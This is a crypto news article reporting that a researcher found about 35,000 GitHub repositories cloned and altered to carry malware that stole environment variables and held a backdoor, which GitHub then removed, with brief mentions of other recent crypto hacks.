See More

Crypto Threat: Malware Infiltrates Github Cloning Thousands of Repos

2 mins
Updated by Kyle Baird
Join our Trading Community on Telegram

In Brief

  • As many as 35,000 repos have been cloned.
  • A malicious URL attempts to steal data.
  • Github has cleaned up the fake repos .
  • promo

The developer platform Github has been inundated with malware which has infiltrated tens of thousands of repositories.

As many as 35,000 Github repositories have been cloned with malware according to a security researcher.

The widespread malware attack did not target crypto repositories (repos) specifically, but they have been among those impacted.

Software engineer Stephen Lacy alerted the crypto community to the incursion on Aug. 3.

Cloning Github repos

Tech portal Bleeping Computer reported that the repos were not hacked but had been copied with their clones altered to include the malware. Cloning open source code is a common practice among developers, however, the attackers have injected malicious code and links into legitimate projects to target unsuspecting developers.

Several projects from crypto, Golang, Python, JavaScript, Bash, Docker, and Kubernetes have been affected by the attack, the researcher noted.

While reviewing a project he had found from a Google search, the engineer noticed a malicious URL in the code. Scanning Github repos for this URL returned more than 35,000 results.

Bleeping Computer said that more than 13,000 search results were from a single repository called ‘redhat-operator-ecosystem.’ The malicious URL “exfiltrated a user’s environment variables but additionally contained a one-line backdoor,” the report added.

These environment variables can contain sensitive data such as API keys, tokens, Amazon AWS credentials, and crypto keys. The malware also allows remote attackers to execute arbitrary code on the systems of all those who install and run the clones.

The majority of the cloned repos had appeared within the past month, the report stated.

Github confirmed that the original repositories were not compromised and it had cleaned up or quarantined the clones.

Last month, BeInCrypto reported that a new strain of malware written in Rust was doing the rounds. Luca Stealer targets Windows operating systems and steals sensitive information such as crypto wallet information. The malware was also distributed on Github.

Miserable week in crypto

DeFi researcher Miles Deutscher pointed out that it has not been a great week in crypto. Earlier this week the Nomad bridge was exploited for $190 million and a few hours after, around 8,000 Solana wallets were hacked resulting in the theft of an estimated $8 million.

Markets appear to be unaffected though as total capitalization has gained 1.7% on the day to reach $1.12 trillion at the time of writing.

Top crypto platforms in the US | April 2024
Coinbase Coinbase Explore →
AlgosOne AlgosOne Explore →
Chain GPT Chain GPT Explore →
iTrustCapital iTrustCapital Explore →

Trusted

Disclaimer

In adherence to the Trust Project guidelines, BeInCrypto is committed to unbiased, transparent reporting. This news article aims to provide accurate, timely information. However, readers are advised to verify facts independently and consult with a professional before making any decisions based on this content. Please note that our Terms and ConditionsPrivacy Policy, and Disclaimers have been updated.

profile.jpg
Martin Young
Martin Young is a seasoned cryptocurrency journalist and editor with over 7 years of experience covering the latest news and trends in the digital asset space. He is passionate about making complex blockchain, fintech, and macroeconomics concepts understandable for mainstream audiences.   Martin has been featured in top finance, technology, and crypto publications including BeInCrypto, CoinTelegraph, NewsBTC, FX Empire, and Asia Times. His articles provide an in-depth analysis of...
READ FULL BIO
Sponsored
Sponsored